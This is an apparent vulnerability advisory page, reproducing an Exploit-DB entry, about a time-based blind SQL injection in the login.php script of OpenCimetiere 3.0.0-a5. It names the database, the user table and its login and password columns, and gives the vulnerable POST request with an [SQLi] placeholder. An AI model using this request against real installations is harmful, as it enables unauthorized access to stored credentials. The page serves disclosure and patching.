OpenCimetiere v3.0.0-a5 | Blind SQL Injection

vendor:

OpenCimetiere

by:

Wad Deek

8,8

CVSS

HIGH

SQL Injection (Type: AND/OR time-based blind)

CWE

Product Name: OpenCimetiere

Affected Version From: 3.0.0-a5

Affected Version To: 3.0.0-a5

Patch Exists: Yes

Related CWE: N/A

CPE: a:openmairie:opencimetiere:3.0.0-a5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Xampp with PostgreSQL on Windows 7

2016

OpenCimetiere v3.0.0-a5 | Blind SQL Injection

A blind SQL injection vulnerability was discovered in OpenCimetiere v3.0.0-a5. The vulnerability exists in the login.php script, which is vulnerable to an AND/OR time-based blind SQL injection attack. An attacker can exploit this vulnerability by sending a specially crafted POST request to the login.php script with a malicious SQL query in the login parameter. This can allow an attacker to gain access to the database and potentially execute arbitrary code.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of OpenCimetiere.

Source

Exploit-DB raw data:

# Exploit Title: OpenCimetiere v3.0.0-a5 | Blind SQL Injection
# Date: 06/08/16
# Exploit Author: Wad Deek
# Vendor Homepage: http://www.openmairie.org/
# Software Link: http://www.openmairie.org/catalogue/opencimetiere/
# Version: 3.0.0-a5
+>3.0.0-a5<+ --> /opencimetiere/HISTORY.txt
# Tested on: Xampp with PostgreSQL on Windows 7
# Fuzzing tool: https://github.com/Trouiller-David/PHP-Source-Code-Analysis-Tools

################################################################
[SQL Injection (Type: AND/OR time-based blind)]
################################################################
[Database] opencimetiere
[Table] om_utilisateur
[Columns] login,pwd
{POST} "/opencimetiere/scr/login.php", "login.action.connect=Se%20connecter&came_from=&login=[SQLi]&password=paSSw0rd"
################################################################